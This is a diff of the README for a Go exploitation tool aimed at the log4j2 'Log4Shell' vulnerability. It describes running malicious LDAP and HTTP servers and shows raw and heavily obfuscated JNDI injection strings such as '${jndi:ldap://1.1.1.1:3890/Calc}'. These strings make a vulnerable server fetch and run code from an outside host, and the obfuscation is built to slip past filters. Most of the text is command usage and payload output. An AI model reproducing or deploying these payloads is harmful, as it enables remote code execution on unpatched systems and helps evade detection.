11# Log4Shell
2- * Check, exploit, obfuscate, TLS, ACME in one Go program.
3- * You don't need to install anything except develop it.
2+ * Check, exploit, obfuscate, TLS, ACME about log4j2 vulnerability in one Go program.
3+ * Support common operating systems, not need install any dependency.
4+ * Don't need to install anything except you want to develop this project.
45
56## Usage
67 ### Start LDAP and HTTP server
1718 ### Obfuscate malicious(payload) string
1819 ```
1920 Log4Shell.exe -obf "${jndi:ldap://1.1.1.1:3890/Calc}"
21+ ```
22+ ```
23+ raw: ${jndi:ldap://1.1.1.1:3890/Calc_27sHQFpxvwFamvBP}
2024
21- raw: ${jndi:ldap://1.1.1.1:3890/Calc}
25+ ${j${Wmmra:CaPId:-nd}${Pd:nmPbJde:vWo9b:MUDN6w:-i:l}dap${73xrLJ:ml9s81:-}${J4T2-fyx2:-:}
26+ /${PU1W:Ojl2xNxM:LZdr6:Rnb:-/1.}1.${R1Edku:MWjEv3bG:ZKMVOC4d5C:hxjRF:-}${5h2bPs:ItU:-1.}
27+ ${ogS5N:nmmhQcYA8-axELsuz03:14:-}${rP:8SL:-}${l31C:0X1Ey:-1}${NANl9M:Pfxb2obs9-PU5bDprOX
28+ leb-wHz:-:3}${4MyG:H2h1V2rcTu-P6IDGS4eL:Hk2e:-}${kBUQ:DWF8O:RGSKOognGm:Gcb4g:-890}${kt:R
29+ Nj1QL:LJq3xSbQ-QMJ:-/}${mu9nfI-wJul-thdzcWf5G-1eYs:-}C${Cw:CrVaSz-zv:-alc}_2${Pk-1FL1teD
30+ 6OlWC:yIn6DNeu6-8UUF:-7s}${GDuei:4HWSj:Ra31Mg-PZsPG:-HQF}${myZoY-7Oko:-px}${Tc3hLd-XdMY7
31+ :-v}${XaDK4l:oWc:-w}${ZE-TP:-}Fa${2SuF:n465x:-m}${Cdh5xl-hblvwX4Kq:Mj:-v}BP${5V8O-CwErDR
32+ 2Ji:UjT:-}}
2233
23- ${jn${Nc3-h17cwiZ-bRU2sh:-di:}${CGPuF-OGZxNU-zZfWp:-l}${wW:sVK9ZUijf:jUelV4upFr:wjD:-}d${OZQ-MqOEGT9K
24- -IAdC:-ap}${Kce64-15l39K4DD5-xWtee:zY:-:/}${gZm-yFU0:-}${o05ov5-9bU2WWgtlf:PK5:-/}${y7sa1T:aFd6Q7S45r
25- -KYGD:-}${0dPYxy:IqCd:-1}${YSf-yHfZ:-.1}${Jct1X-kQVdPM:cKmXcaheDfY:kI:-}.${It:CK52YEP-6HC:-1.1}${rzgS
26- :e1wOc5zHLe-Q1tI2IqBj-G2A:-}:3${NMDyH8-bsqLVD-m0HdT:ik:-}${Bg-2GX6XW:CFHnf:-}${4sqv:HPwwv:-89}0${BzHb
27- q-JBkQtJ7qDz:L7PaQXH:PUYv91:-/C}${QfhcM:tn:-}${6e-OkiFFt:WtnF:-al}c${etTbi-iWYq-pvATIA6K2K:Rq:-}}
34+ Each string can only be used once, or wait 20 seconds.
35+ ```
36+ ```
37+ When obfuscate malicious(payload) string, log4j2 package will repeat execute it, the
38+ number of repetitions is equal the number of occurrences about string "${". The LDAP
39+ server add a simple token mechanism for prevent it.
2840 ```
2941
3042## Check
3143 * start Log4Shell server
32- * put your class file to the payload directory
3344 * send ``` ${jndi:ldap://1.1.1.1:3890/Nop} ```
3445 * send ``` ${jndi:ldaps://example.com:3890/Nop} ``` with TLS
3546
5970
6071Usage of Log4Shell.exe:
6172 -auto-cert
62- use ACME client to sign certificate
73+ use ACME client to sign certificate automatically
6374 -host string
6475 server IP address or domain name (default "127.0.0.1")
6576 -http-addr string
@@ -70,6 +81,8 @@ Usage of Log4Shell.exe:
7081 ldap server address (default ":3890")
7182 -ldap-net string
7283 ldap server network (default "tcp")
84+ -no-token
85+ not add random token when use obfuscate
7386 -obf string
7487 obfuscate malicious(payload) string
7588 -payload string
0 commit comments